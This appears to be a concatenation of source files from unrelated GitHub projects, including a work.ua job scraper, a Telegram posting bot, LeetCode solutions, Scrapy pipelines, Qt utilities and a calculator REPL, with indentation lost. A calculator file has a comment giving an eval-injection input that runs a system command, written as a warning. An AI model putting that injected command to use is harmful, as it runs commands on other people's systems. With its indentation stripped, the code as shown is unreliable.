print('Info: \'Stemmer\' is slow operation, so performs need some time.')
print('Wait few seconds...\n\n')
data_filename = 'it_jobs.txt'
data_lines = load_file(data_filename)
shuffle(data_lines)
classificate_jobs(
data_lines,
exclude_words=[],
num_of_train_rows=300,
num_of_common_words=500,
percent_of_accept=15,
is_stem=True
)
```
#### File: ds-hr-helper/webscraper/helpers.py
```python
from .logger import logger
def url_filter(url, state, pattern):
if not pattern.match(url):
raise ValueError
def get_node_flat_string(tag, separator=' '):
content = tag.get_text(separator=separator)
content_parts = content.split()
return separator.join(content_parts)
def append_to_file(filename, content, new_line=True):
with open(filename, 'a', encoding='utf-8') as file:
file.write(content)
logger.info('Write line to file(%s).', filename)
if new_line:
file.write('\n')
```
#### File: ds-hr-helper/webscraper/link_spider.py
```python
from urllib.parse import urljoin, urldefrag, urlparse
from bs4 import BeautifulSoup
async def link_spider(url, state, scraper, host=None):
html_content = state[url]
soup = BeautifulSoup(html_content, 'lxml')
links = soup.find_all('a', href=True)
urls = []
for page_link in links:
href = page_link.get('href').strip()
href = urljoin(url, href)
href = urldefrag(href)[0]
if host is None or urlparse(href).hostname == host:
urls.append(href)
scraper.fetch_urls(urls)
```
#### File: ds-hr-helper/webscraper/webscraper.py
```python
import asyncio
from inspect import isawaitable
import aiohttp
from .logger import logger
EVENT_WORKER_START = 'worker_start'
EVENT_WORKER_END = 'worker_end'
EVENT_BEFORE_REQUEST = 'before_request'
EVENT_AFTER_REQUEST = 'after_request'
class ScraperDataState(object):
def __init__(self):
self.data = {}
self.fetched_urls = {}
def __getitem__(self, key):
if key in self.data:
return self.data[key]
return None
def __iter__(self):
return self.data.__iter__()
def prepare(self, url):
self.fetched_urls[url] = None
def save(self, url, data):
self.data[url] = data
class WebScraper(object):
MAX_ATTEMPTS_TO_RETRY_LOOP = 5
DEFAULT_CONCURRENCY_LIMIT = 8
TIMEOUT_LIMIT = 120
DEFAULT_REQUEST_PER_MINUTE = 10000
def __init__(self, urls, dispatcher=None, rpm=None, timeout=None):
self.__urls = urls[:]
self.__dispatcher = dispatcher if dispatcher else HandlerDispatcher()
self.__rpm = rpm if rpm else self.DEFAULT_REQUEST_PER_MINUTE
self.__retry_timeout = timeout if timeout else self.TIMEOUT_LIMIT
self.__remaining_num_of_attempts = self.MAX_ATTEMPTS_TO_RETRY_LOOP
self.__concurrency_limit = self.DEFAULT_CONCURRENCY_LIMIT
self.__state = ScraperDataState()
self.__delay_buffer_size = 0
self.__is_forced_stop = False
def fetch_urls(self, urls):
self.__urls.extend(urls)
async def travel(self):
await self.__dispatcher.dispatch(EVENT_WORKER_START,
state=self.__state)
while not self.__is_forced_stop:
urls = self.__get_url_batch()
await asyncio.gather(*[self.__fetch(url) for url in urls],
return_exceptions=False)
await self.__check_timeout_limit()
await self.__dispatcher.dispatch(EVENT_WORKER_END, state=self.__state)
async def __fetch(self, url, **kwargs):
self.__state.prepare(url)
try:
await self.__dispatcher.dispatch(EVENT_BEFORE_REQUEST,
state=self.__state, url=url)
except ValueError:
return
await self.__delay()
try:
async with aiohttp.ClientSession() as session:
async with session.get(url, **kwargs) as response:
response_text = await response.text()
self.__state.save(url, response_text)
await self.__dispatcher.dispatch(EVENT_AFTER_REQUEST,
state=self.__state,
url=url)
except (aiohttp.client_exceptions.InvalidURL, ValueError):
return
async def __delay(self, min_delay=10):
rps = 60 / self.__rpm
self.__delay_buffer_size += rps
if self.__delay_buffer_size >= min_delay:
sleep_time, rest_delay = divmod(self.__delay_buffer_size, 1)
self.__delay_buffer_size = rest_delay
logger.info('Delay %s seconds for RPM limiting.', sleep_time)
await asyncio.sleep(sleep_time)
async def __check_timeout_limit(self):
if self.__urls:
self.__remaining_num_of_attempts = self.MAX_ATTEMPTS_TO_RETRY_LOOP
else:
self.__remaining_num_of_attempts -= 1
if self.__remaining_num_of_attempts <= 0:
self.__is_forced_stop = True
return
timeout_msg_template = 'Waiting for new urls, timeout %s seconds.'
logger.info(timeout_msg_template, self.__retry_timeout)
await asyncio.sleep(self.__retry_timeout)
def __get_url_batch(self):
urls_batch = set()
while self.__urls and len(urls_batch) < self.__concurrency_limit:
url = self.__urls.pop()
if url not in self.__state.fetched_urls and url not in urls_batch:
urls_batch.add(url)
return urls_batch
class HandlerDispatcher(object):
def __init__(self):
self.__handlers = {}
async def dispatch(self, channel, *args, return_exceptions=True, **kwargs):
if channel not in self.__handlers:
return
for handler, bound_kwargs in self.__handlers[channel]:
try:
result = handler(*args, **kwargs, **bound_kwargs)
if isawaitable(result):
await result
except Exception as e:
if return_exceptions:
raise e
def register(self, handler, *channels, **kwargs):
if not hasattr(handler, '__call__'):
raise TypeError("Handler not callable.")
for channel in channels:
if channel not in self.__handlers:
self.__handlers[channel] = []
self.__handlers[channel].append((handler, kwargs))
```
#### File: 5x/ds-hr-helper/work_ua_scraper.py
```python
import asyncio
import re
import sys
from bs4 import BeautifulSoup
from webscraper.webscraper import HandlerDispatcher, WebScraper, \
EVENT_BEFORE_REQUEST, EVENT_AFTER_REQUEST
from webscraper.link_spider import link_spider
from webscraper.helpers import get_node_flat_string, append_to_file, \
url_filter
from webscraper.logger import logger, http_logger
if sys.platform not in ('win32', 'cygwin', 'cli'):
import uvloop
policy = uvloop.EventLoopPolicy()
asyncio.set_event_loop_policy(policy)
def data_work_ua_jobs_extractor(url, state, filename):
html_content = state[url]
soup = BeautifulSoup(html_content, 'lxml')
card = soup.find('div', {'class': 'card wordwrap'})
if not card:
return
it_job_node = soup.find(it_job_node_filter)
if not it_job_node:
return
content = get_node_flat_string(card)
job_description = get_job_description(content)
if job_description:
append_to_file(filename, job_description)
def it_job_node_filter(tag):
try:
category_link = tag.name == 'a' and 'IT' in tag.get_text()
wrapper_node = tag.parent.parent.parent.find('h5')
category_header = 'Вакансии в категор' in wrapper_node.get_text()
return category_link and category_header
except AttributeError:
return False
def get_job_description(content):
start_separator = 'Описание вакансии '
end_separator = ' Отправить резюме'
start_index = content.find(start_separator) + len(start_separator)
end_index = content.find(end_separator)
if start_index < 0 or end_index < 0:
return None
return content[start_index:end_index]
def scrap():
urls = ['https://www.work.ua/jobs-it/?category=1']
dispatcher = HandlerDispatcher()
scraper = WebScraper(urls, dispatcher)
filter_pattern = re.compile(
'^https:\/\/www.work.ua\/(jobs-it\/|jobs\/\d+\/$)')
dispatcher.register(url_filter, EVENT_BEFORE_REQUEST,
pattern=filter_pattern)
dispatcher.register(http_logger, EVENT_AFTER_REQUEST)
dispatcher.register(link_spider, EVENT_AFTER_REQUEST,
scraper=scraper)
dispatcher.register(data_work_ua_jobs_extractor, EVENT_AFTER_REQUEST,
filename='it_jobs.txt')
logger.info('Start scrapping....')
loop = asyncio.get_event_loop()
loop.run_until_complete(scraper.travel())
loop.close()
logger.info('Completed.')
if __name__ == '__main__':
scrap()
``` |
{
"source": "5xJIN/DailyAlgorithm",
"score": 3
} |
#### File: DailyAlgorithm/LeetCode/1. Two Sum.py
```python
Two Sum.py
"""
# Runtime : 32 ms
# Memory : 14.6 MB
"""
class Solution:
def twoSum(self, nums: List[int], target: int) -> List[int]:
resultDict = dict()
for i in range(len(nums)):
if nums[i] in resultDict:
return [resultDict[nums[i]], i]
resultDict[target - nums[i]] = i
```
#### File: DailyAlgorithm/LeetCode/9. Palindrome Number.py
```python
class Solution:
def isPalindrome(self, x: int) -> bool:
maxSize = pow(2, 31)
if 0 < x < maxSize - 1:
origin = x
revert = 0
while (origin > 0):
revert = revert * 10
remainder = origin % 10
origin = origin // 10
revert += remainder
return x == revert
else:
if x == 0:
return True
else:
return False
``` |
{
"source": "5x/tg_schedule_woodpecker",
"score": 3
} |
#### File: 5x/tg_schedule_woodpecker/main.py
```python
import html
import json
import logging
import traceback
from pathlib import Path
from telegram import Update, ParseMode
from telegram.ext import Updater, CommandHandler
# The token you got from @botfather when you created the bot
API_TOKEN = '{{YOU_API_TOKEN}}'
# This can be your own ID, or one for a developer group/channel.
# You can use the /uinfo command of this bot to see your chat id.
DEVELOPER_CHAT_ID = 12345678
# Users who can execute commands with elevated rights.
PRIVILEGED_USERS = (DEVELOPER_CHAT_ID,)
# The channel to which the bot will publish content.
# Bot must be an administrator of channel & have permission to post.
CHANNEL = '@you_channel_to_post'
# The destination path for the source media to be published.
RESOURCE_PATH = Path('./data')
# The destination path for media already published.
PUBLISHED_ARCHIVE = Path('./data/published_archive')
# Enable logging
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO
)
logger = logging.getLogger(__name__)
def start_handler(update: Update, _):
"""Initial user communication dialog."""
info_text = '*tg_schedule_woodpecker* _v1.0.1_\n' \
'Hello! I am sending media files to Telegram channel ' \
'according to selected interval schedule.\n\n' \
'You can control me by sending these commands:\n\n' \
'*Commands*\n' \
'/start - Initial point (now you here)\n' \
'/help - List of available commands (same as /start)\n' \
'/send - Post next media to channel now\n' \
'/set [[interval]] - Create schedule job for publishing a ' \
'limited set of media\n' \
'/clear - Clear the current job queue\n' \
'/uinfo - You personal Telegram account information'
update.message.reply_text(info_text, parse_mode=ParseMode.MARKDOWN)
def error_handler(update, context):
"""Log the error and send a telegram message to notify the developer."""
error = context.error
tb_list = traceback.format_exception(None, error, error.__traceback__)
tb_string = ''.join(tb_list)
logger.error(msg="Exception was raised:", exc_info=error)
update_str = update.to_dict() if isinstance(update, Update) else str(update)
update_str = json.dumps(update_str, indent=2, ensure_ascii=False)
update_str = html.escape(update_str)
chat_data = html.escape(str(context.chat_data))
user_data = html.escape(str(context.user_data))
message = (
f'An exception was raised while handling an update\n'
f'<pre>update = {update_str}</pre>\n\n'
f'<pre>context.chat_data = {chat_data}</pre>\n\n'
f'<pre>context.user_data = {user_data}</pre>\n\n'
f'<pre>{html.escape(tb_string)}</pre>'
)
context.bot.send_message(chat_id=DEVELOPER_CHAT_ID,
text=message,
parse_mode=ParseMode.HTML)
def check_access_rights(func):
def wrapper(update, context):
chat_id = update.message.chat_id
if chat_id in PRIVILEGED_USERS:
func(update, context)
else:
update.message.reply_text('Not enough access rights!')
return wrapper
def uinfo_handler(update, _):
"""Handle /uinfo cmd. Provide personal Telegram account information."""
user = update.message.from_user
update.message.reply_text(
f'Your Telegram personal info:\n'
f'ID: *{user.id}*\n'
f'Is BOT: *{user.is_bot}*\n\n'
f'First name: *{user.first_name}*\n'
f'Last name : *{user.last_name}*\n'
f'Username : *{user.username}*\n\n'
f'Language code: *{user.language_code}*\n\n'
f'Can join groups : *{user.can_join_groups}*\n'
f'Can read all group messages : *{user.can_read_all_group_messages}*\n'
f'Supports inline queries : *{user.supports_inline_queries}*',
parse_mode=ParseMode.MARKDOWN)
def send_typed_media(resource_path, bot, channel):
"""Send file as bytes by `resource_path`.
Send type based on file extension."""
ext = resource_path.suffix.lower()
media_resource = open(resource_path, 'rb')
if ext in ('.jpeg', '.jpg', '.png'):
return bot.send_photo(chat_id=channel, photo=media_resource)
elif ext in ('.mp4', '.mov', '.gif', '.webp'):
return bot.send_animation(chat_id=channel, animation=media_resource)
def post_next_media(bot, channel, from_path, to_path):
"""Publish first available media file from iterable path object.
After file will be moved to archive folder."""
for item in from_path.iterdir():
if item.is_dir():
continue
message = send_typed_media(item, bot, channel)
if message and hasattr(message, 'date'):
item.replace(to_path.joinpath(item.name))
return message
def publish_next_media_to_channel(context, chat_id):
"""Publish next media to channel now."""
message = post_next_media(context.bot, CHANNEL, RESOURCE_PATH,
PUBLISHED_ARCHIVE)
if message is not None:
message_id = message.message_id
context.bot.send_message(chat_id, f'Published message: #{message_id}')
else:
signal_empty_storage(context.bot, chat_id)
clear(context.bot, context, chat_id)
@check_access_rights
def send_handler(update, context):
"""Handle /send cmd. Publish next media to channel now"""
publish_next_media_to_channel(context, update.message.chat_id)
def send_callback(context):
"""Callback wrapper for publishing next media"""
publish_next_media_to_channel(context, chat_id=context.job.context)
@check_access_rights
def set_handler(update, context):
"""Handle /set cmd. Add a job to the queue."""
chat_id = update.message.chat_id
try:
# args[0] contain the time for the timer in seconds
interval = int(context.args[0])
name = str(chat_id)
if interval < 0:
raise ValueError('Invalid argument')
remove_job_if_exists(str(chat_id), context)
context.job_queue.run_repeating(send_callback, interval,
context=chat_id, name=name)
start_queue_text = f'Next publish will be after {interval} seconds.'
update.message.reply_text(start_queue_text)
except (IndexError, ValueError):
update.message.reply_text('Usage: /set <seconds>')
@check_access_rights
def clear_handler(update, context):
"""Handle /clear cmd. Remove the current job queue."""
chat_id = update.message.chat_id
clear(context.bot, context, chat_id)
def clear(bot, context, chat_id):
"""Clear the job queue by chat_id identifier"""
job_removed = remove_job_if_exists(str(chat_id), context)
text = 'Timer successfully cancelled!' if job_removed else 'You have no active timer.'
bot.send_message(chat_id=chat_id, text=text)
def remove_job_if_exists(name, context):
"""Remove job with given name. Returns whether job was removed."""
current_jobs = context.job_queue.get_jobs_by_name(name)
if not current_jobs:
return False
for job in current_jobs:
job.schedule_removal()
return True
def signal_empty_storage(bot, chat_id):
"""Inform the user that the resource folder does not contain a valid
media file."""
warn_text = f'Resource folder don`t contain available media resource.'
bot.send_message(chat_id=chat_id, text=warn_text)
def main() -> None:
"""Run bot."""
updater = Updater(API_TOKEN)
# Get the dispatcher to register handlers
dispatcher = updater.dispatcher
dispatcher.add_handler(CommandHandler("start", start_handler))
dispatcher.add_handler(CommandHandler("help", start_handler))
dispatcher.add_handler(CommandHandler("send", send_handler))
dispatcher.add_handler(CommandHandler("set", set_handler))
dispatcher.add_handler(CommandHandler("clear", clear_handler))
dispatcher.add_handler(CommandHandler("uinfo", uinfo_handler))
dispatcher.add_error_handler(error_handler)
updater.start_polling()
# Block until you press Ctrl-C or the process receives SIGINT, SIGTERM or
# SIGABRT. This should be used most of the time, since start_polling() is
# non-blocking and will stop the bot gracefully.
updater.idle()
if __name__ == '__main__':
main()
``` |
{
"source": "5yutan5/QMaterialStyleSheet",
"score": 2
} |
#### File: QMaterialStyleSheet/tests/test_widget_gallery.py
```python
import pytest
from pytestqt.qtbot import QtBot
from qdarktheme.widget_gallery.__main__ import WidgetGallery
@pytest.fixture()
def widget_gallery(qtbot: QtBot) -> WidgetGallery:
"""Create test instance of WidgetGallery."""
widget_gallery = WidgetGallery()
qtbot.add_widget(widget_gallery)
widget_gallery.show()
return widget_gallery
def test_actions(widget_gallery: WidgetGallery, monkeypatch: pytest.MonkeyPatch) -> None:
"""Ensure the actions work correctly."""
from qdarktheme.qtpy.QtWidgets import QMessageBox
for message_type in ("question", "information", "warning", "critical"):
monkeypatch.setattr(QMessageBox, message_type, lambda a, b, c: (a, b, c))
actions = [widget_gallery._ui.action_enable, widget_gallery._ui.action_disable]
actions += widget_gallery._ui.actions_page
actions += widget_gallery._ui.actions_theme
actions += widget_gallery._ui.actions_message_box
actions += widget_gallery._ui.actions_message_box
for action in actions:
action.triggered.emit()
``` |
{
"source": "5yutan5/qt-material",
"score": 2
} |
#### File: qt_material/resources/generate.py
```python
import os
import shutil
from pathlib import Path
HOME = Path.home()
RESOURCES_PATH = os.path.join(HOME, '.qt_material')
########################################################################
class ResourseGenerator:
""""""
# ----------------------------------------------------------------------
def __init__(self, primary, secondary, disabled, source, parent='theme'):
"""Constructor"""
if parent.startswith('/'):
self.index = parent
if parent.startswith('.'):
self.index = parent[1:]
else:
self.index = os.path.join(RESOURCES_PATH, parent)
self.contex = [
(os.path.join(self.index, 'disabled'), disabled),
(os.path.join(self.index, 'primary'), primary),
]
self.source = source
self.secondary = secondary
for folder, _ in self.contex:
shutil.rmtree(folder, ignore_errors=True)
os.makedirs(folder, exist_ok=True)
# ----------------------------------------------------------------------
def generate(self):
""""""
for icon in os.listdir(self.source):
if not icon.endswith('.svg'):
continue
with open(os.path.join(self.source, icon), 'r') as file_input:
content_original = file_input.read()
for folder, color in self.contex:
new_content = self.replace_color(content_original, color)
new_content = self.replace_color(
new_content, self.secondary, '#ff0000')
file_to_write = os.path.join(folder, icon)
with open(file_to_write, 'w') as file_output:
file_output.write(new_content)
# ----------------------------------------------------------------------
def replace_color(self, content, replace, color='#0000ff'):
""""""
colors = [color] + [''.join(list(color)[:i] +
['\\\n'] + list(color)[i:]) for i in range(1, 7)]
for c in colors:
content = content.replace(c, replace)
replace = '#ffffff00'
color = '#000000'
colors = [color] + [''.join(list(color)[:i] +
['\\\n'] + list(color)[i:]) for i in range(1, 7)]
for c in colors:
content = content.replace(c, replace)
return content
``` |
{
"source": "5yutan5/SerialMonitor",
"score": 3
} |
#### File: SerialMonitor/serialMonitor/widgets.py
```python
from typing import Union
from PySide6.QtWidgets import QComboBox
from serial.tools import list_ports
from serial.tools.list_ports_common import ListPortInfo
class PortCombobox(QComboBox):
def __init__(self, filter: str = None) -> None:
super().__init__()
self._port_infos = []
self._default_text = "Select Port"
self.filter = "" if filter is None else filter
self.addItem(self._default_text)
def get_current_port_info(self) -> Union[ListPortInfo, None]:
return (
None
if len(self._port_infos) == 0
else self._port_infos[self.currentIndex()]
)
def showPopup(self) -> None:
self._port_infos.clear()
self.clear()
self._port_infos = [
port
for port in list_ports.comports()
if self.filter in str(port.description)
]
if len(self._port_infos) == 0:
self.addItem(self._default_text)
else:
self.addItems([str(port.description) for port in self._port_infos])
width = self.view().sizeHintForColumn(0)
self.view().setMinimumWidth(width)
super().showPopup()
``` |
{
"source": "602p/starfighter_revival",
"score": 3
} |
#### File: 602p/starfighter_revival/ui.py
```python
import pygame, game, ship, math
class Radar:
def __init__(self, player, screen):
self.ring_count=10
self.extra_time=7
self.ring_spacing=10
self.ring_timing=50
self.full_scale=5000
self.curr_ring=0
self.curr_ring_time=pygame.time.get_ticks()
self.sz=(self.ring_count+1)*self.ring_spacing*2
self.rect=pygame.Rect(screen.get_width()-self.sz, 0, self.sz, self.sz)
self.fill_surf=pygame.Surface(self.rect.size).convert_alpha()
self.fill_surf.fill((150,150,150,80))
self.screen=screen
self.player=player
self.scale_factor=self.sz/self.full_scale
self.green_arrow = game.get_image("assets/radar/green_arrow.png").convert_alpha()
self.red_arrow = game.get_image("assets/radar/red_arrow.png").convert_alpha()
self.grey_arrow = game.get_image("assets/radar/grey_arrow.png").convert_alpha()
self.target_icon = game.get_image("assets/radar/target.png").convert_alpha()
def render(self, dt):
if pygame.time.get_ticks()-self.curr_ring_time>self.ring_timing:
self.curr_ring+=1
self.curr_ring_time=pygame.time.get_ticks()
if self.curr_ring>self.ring_count+self.extra_time:
self.curr_ring=0
pygame.draw.rect(self.screen, (200,200,200,100), self.rect, 4)
self.screen.blit(self.fill_surf, self.rect)
for i in range(self.ring_count):
pygame.draw.circle(self.screen,
(255,255,255) if i==self.curr_ring else (150,150,150), self.rect.center, (i+1)*self.ring_spacing, 1)
for e in list(game.client.owned_entities.values()):
self.draw_ship(e)
for e in list(game.client.remote_entities.values()):
self.draw_ship(e)
def draw_ship(self, e):
if e.faction==self.player.faction and e.type.raw.get("render_only_for_enemy"):
return
icon=(self.grey_arrow if e is self.player else self.green_arrow) if e.faction==self.player.faction else self.red_arrow
self.screen.blit(icon, (0,0))
image, rect = ship.rot_center(icon, icon.get_rect(), e.angle)
rect=rect.move(((e.rect.centerx-self.player.rect.centerx)*self.scale_factor,
(e.rect.centery-self.player.rect.centery)*self.scale_factor))
if math.sqrt((rect.centerx**2)+(rect.centery**2))>(self.sz/2)-10:
return
rect=rect.move(self.rect.center).move((-icon.get_width()/2, -icon.get_height()/2))
overlay_pos=(((e.rect.centerx-self.player.rect.centerx)*self.scale_factor)+self.rect.centerx-(e.type.map_icon.get_width()/2),
((e.rect.centery-self.player.rect.centery)*self.scale_factor)+self.rect.centery-(e.type.map_icon.get_height()/2))
self.screen.blit(e.type.map_icon, (overlay_pos[0], overlay_pos[1]-5))
if e.type.do_normal_map_icon:
self.screen.blit(image, rect)
if rect.collidepoint(pygame.mouse.get_pos()):
if pygame.mouse.get_pressed()[0]:
if e.faction!=self.player.faction:
self.player.target=e
# pygame.draw.rect(self.screen, (255,0,0), rect, 2)
if e is self.player.target:
self.screen.blit(self.target_icon, overlay_pos)
``` |
{
"source": "602p/yeezip",
"score": 3
} |
#### File: src/extentions/shell.py
```python
import traceback
print("(Hacky shell running inside yeezip!)")
run=1
def quit():
global run
run=0
while run:
try:
print(eval(input(">>> ")))
except BaseException as e:
traceback.print_exc()
```
#### File: 602p/yeezip/test.py
```python
import subprocess, sys, os
class SubprocessReturnValue:
def __init__(self, code, value):
self.code=code
self.value=value.decode('ascii', 'ignore')
def __str__(self): return self.value
def __eq__(self, other): return other==self.value
def __contains__(self, k): return k in self.value
def call(*args):
try:
return SubprocessReturnValue(0, subprocess.check_output(args))
except subprocess.CalledProcessError as e:
return SubprocessReturnValue(e.returncode, e.output)
def callc(*args):
return call("./compress", *args)
def test(val, msg):
if not val:
global bueno
bueno=False
print("\033[91m***FAILED: "+msg+"!***\033[0m")
if "nointeg" not in sys.argv:
bueno=True
os.system("python3 -m build espam lln rbx nr")
print("Running Integration tests... ")
test("No operation" in callc(), "Accepted no args")
test("Base Usage" in callc("-h"), "Didn't provide help")
test(""==callc("-q"), "Didn't shut up with -q")
test("Compressing" in callc("-c", "samples/hexdata.txt", "-o", "out.yz", "-astatic", "-ptree=hex2"),\
"Didn't tell me it was compressing")
test("Decompressing" in callc("-x", "out.yz", "-o", "out.txt"), "Didn't tell me it was decompressing")
test(""==call("diff", "samples/hexdata.txt", "out.txt"), "Input != output")
test(""==callc("-c", "samples/hexdata.txt", "-o", "out.yz", "-astatic", "-ptree=hex2", "-q"),\
"Didn't shut up when compressing for real")
test("Char 0 was found in file but not in LookupTable, ignoring" in \
callc("-c", "samples/hexdata.txt", "-o", "out.yz", "-astatic", "-ptree=abc"),\
"Didn't warn when compressing with bad tree")
test("Extention deeznuts not found" in \
callc("-c", "samples/hexdata.txt", "-o", "out.yz", "-adeeznuts"),\
"Didn't fail with invalid extension")
test("Saving tree" in callc("-c", "samples/hexdata_small.txt", "-o", "out.yz", "-O", "-s", "out.yt",
"-astatic", "-ptree=hex2"), "Didn't save tree outside of file")
test("HF_NOTREE set" in callc("-x", "out.yz", "-o", "out.txt"), "Didn't fail w/o tree (or tree was saved)")
test(callc("-x", "out.yz", "-o", "out.txt", "-l", "out.yt").code==0, "Failed to decompress w/ external tree")
test(""==call("diff", "samples/hexdata_small.txt", "out.txt"), "Input != output when using external tree")
call("rm", "out.yz", "out.yt", "out.txt")
if bueno:
print("\033[92m\t\t\t\t\tALL GOOD!\033[0m")
if "nounit" not in sys.argv:
print("Running unittests...")
os.system("python3 -m build tests")
``` |
{
"source": "603721847/GPT2-NewsTitle",
"score": 3
} |
#### File: 603721847/GPT2-NewsTitle/app.py
```python
import streamlit as st
from model import GPT2LMHeadModel
from transformers import BertTokenizer
import argparse
import os
import torch
import time
from generate_title import predict_one_sample
st.set_page_config(page_title="Demo", initial_sidebar_state="auto", layout="wide")
@st.cache()
def get_model(device, vocab_path, model_path):
tokenizer = BertTokenizer.from_pretrained(vocab_path, do_lower_case=True)
model = GPT2LMHeadModel.from_pretrained(model_path)
model.to(device)
model.eval()
return tokenizer, model
device_ids = 0
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICE"] = str(device_ids)
device = torch.device("cuda" if torch.cuda.is_available() and int(device_ids) >= 0 else "cpu")
tokenizer, model = get_model(device, "vocab/vocab.txt", "output_dir/checkpoint-111844")
def writer():
st.markdown(
"""
## NewsTitleGenerate DEMO
"""
)
st.sidebar.subheader("配置参数")
batch_size = st.sidebar.slider("batch_size", min_value=0, max_value=10, value=3)
generate_max_len = st.sidebar.number_input("generate_max_len", min_value=0, max_value=64, value=32, step=1)
repetition_penalty = st.sidebar.number_input("repetition_penalty", min_value=0.0, max_value=10.0, value=1.2,
step=0.1)
top_k = st.sidebar.slider("top_k", min_value=0, max_value=10, value=3, step=1)
top_p = st.sidebar.number_input("top_p", min_value=0.0, max_value=1.0, value=0.95, step=0.01)
parser = argparse.ArgumentParser()
parser.add_argument('--batch_size', default=batch_size, type=int, help='生成标题的个数')
parser.add_argument('--generate_max_len', default=generate_max_len, type=int, help='生成标题的最大长度')
parser.add_argument('--repetition_penalty', default=repetition_penalty, type=float, help='重复处罚率')
parser.add_argument('--top_k', default=top_k, type=float, help='解码时保留概率最高的多少个标记')
parser.add_argument('--top_p', default=top_p, type=float, help='解码时保留概率累加大于多少的标记')
parser.add_argument('--max_len', type=int, default=512, help='输入模型的最大长度,要比config中n_ctx小')
args = parser.parse_args()
content = st.text_area("输入新闻正文", max_chars=512)
if st.button("一键生成摘要"):
start_message = st.empty()
start_message.write("正在抽取,请等待...")
start_time = time.time()
titles = predict_one_sample(model, tokenizer, device, args, content)
end_time = time.time()
start_message.write("抽取完成,耗时{}s".format(end_time - start_time))
for i, title in enumerate(titles):
st.text_input("第{}个结果".format(i + 1), title)
else:
st.stop()
if __name__ == '__main__':
writer()
``` |
{
"source": "605258778/newsScrapy",
"score": 2
} |
#### File: 605258778/newsScrapy/pipelines.py
```python
import json
import codecs
from scrapy.exceptions import DropItem
from model.config import DBSession
from model.config import Redis
from model.article import Article
# 去重
class DuplicatesPipeline(object):
def process_item(self, item, spider):
if Redis.exists('url:%s' % item['url']):
raise DropItem("Duplicate item found: %s" % item)
else:
Redis.set('url:%s' % item['url'],1)
return item
# 存储到数据库
class DataBasePipeline(object):
def open_spider(self, spider):
self.session = DBSession()
def process_item(self, item, spider):
a = Article(title=item["title"].encode("utf-8"),
url=item["url"],
content=item["content"].encode("utf-8"),
publish_time=item["publish_time"].encode("utf-8"),
publish_user=item["publish_user"].encode("utf-8"),
folder_id=2)
self.session.add(a)
self.session.commit()
def close_spider(self,spider):
self.session.close()
# 存储到文件
class JsonWriterPipeline(object):
def __init__(self):
self.file = codecs.open('items.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item)) + "\n"
self.file.write(line.decode('unicode_escape'))
return item
# 爬取指定条数 100条
class CountDropPipline(object):
def __init__(self):
self.count = 100
def process_item(self, item, spider):
if self.count == 0:
raise DropItem("Over item found: %s" % item)
else:
self.count -= 1
return item
```
#### File: 605258778/newsScrapy/run.py
```python
from spiders.deep_spider import DeepSpider
from model.config import DBSession
from model.rule import Rule
from scrapy.crawler import CrawlerProcess
from scrapy.settings import Settings
import os,time
from twisted.internet import task
from twisted.internet import reactor
from twisted.internet.protocol import Protocol, ServerFactory
import sys
def run():
print sys.modules['twisted.internet.reactor']
settings = Settings()
# crawl settings
settings.set("USER_AGENT", "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36")
settings.set("ITEM_PIPELINES" , {
'pipelines.DuplicatesPipeline': 200,
# 'pipelines.CountDropPipline': 100,
'pipelines.DataBasePipeline': 300,
})
process = CrawlerProcess(settings)
db = DBSession()
rules = db.query(Rule).filter(Rule.enable == 1)
for rule in rules:
process.crawl(DeepSpider,rule)
process.start()
run()
``` |
{
"source": "605data/skeddly-sdk-python",
"score": 3
} |
#### File: skeddly-sdk-python/examples/list_actions_by_credential.py
```python
import skeddly
def Main():
client = skeddly.Client()
try:
# Get the list of credentials in our Skeddly account
credentials = client.list_credentials()
print("%d credential(s) found." % len(credentials))
for c in credentials:
credentialId = c['credentialId']
credentialName = c['name']
print("Credential: %s (%s)" % (credentialName, credentialId))
# Get the actions associated with this credential
actions = client.list_actions(
filter={
"credentialIds": credentialId
})
# Print out each action found for this credential
for a in actions:
actionId = a['actionId']
actionName = a['name']
print("\tAction: %s (%s)" % (actionName, actionId))
print("")
except skeddly.ParameterValidationFailedException as e:
print("Error: " + str(e))
print("ErrorCode:" + e.errorCode)
print("modelState: " + str(e.modelState))
except skeddly.SkeddlyWebException as e:
print("Error: " + str(e))
print("ErrorCode:" + e.errorCode)
if __name__ == "__main__":
Main()
``` |
{
"source": "60East/amps-demo-positions-view-server",
"score": 3
} |
#### File: amps-demo-positions-view-server/publishers/all.py
```python
from multiprocessing import Process
from signal import signal, SIGTERM
from customers import publish_customer_data
from executions import publish_execution_data
from market_data import publish_market_data
execution = None
market_data = None
def sigterm_handler():
if execution:
execution.terminate()
if market_data:
market_data.terminate()
if __name__ == '__main__':
signal(SIGTERM, sigterm_handler)
# publish companies first
publish_customer_data()
# run other publishes in parallel
execution = Process(target=publish_execution_data)
market_data = Process(target=publish_market_data)
execution.start()
market_data.start()
execution.join()
market_data.join()
``` |
{
"source": "60-lines-of-python/calculator",
"score": 3
} |
#### File: 60-lines-of-python/calculator/calc_runner.py
```python
from calc import Calculator
def repl():
calc = Calculator()
while True:
line = input('> ')
try:
print(calc.parse(line))
except SyntaxError as e:
print(f'Syntax Error: {e.msg}')
def bad_repl_do_not_use():
while True:
print(eval(input('> ')))
if __name__ == '__main__':
repl()
#bad_repl_do_not_use() # Can do: __import__('os').system('dir')
``` |
{
"source": "60noy/git-stalk-cli",
"score": 3
} |
#### File: git-stalk-cli/tests/test_user_existence.py
```python
import os
def test_non_existing():
# Githubs username cannot begin with a hyphen
# So there is no way that account with username _O_ exists
process = os.popen('stalk _O_')
output = process.read()
# If API limit is reached, there's no way to test this case
if "API" in output or len(output)<=1:
assert(True)
else:
assert("does not exists" in output)
process.close()
def test_existing():
process = os.popen('stalk 1')
output = process.read()
# If API limit is reached, there's no way to test this case
if "API" in output or len(output)<=1:
assert(True)
else:
assert("followers" in output.lower())
process.close()
``` |
{
"source": "610265158/faceboxes-tensorflow",
"score": 3
} |
#### File: core/api/face_detector.py
```python
import tensorflow as tf
import numpy as np
import cv2
import time
from train_config import config as cfg
from lib.core.model.facebox.net import FaceBoxes
class FaceDetector:
def __init__(self, model_path):
"""
Arguments:
model_path: a string, path to the model params file.
"""
self.model=tf.saved_model.load(model_path)
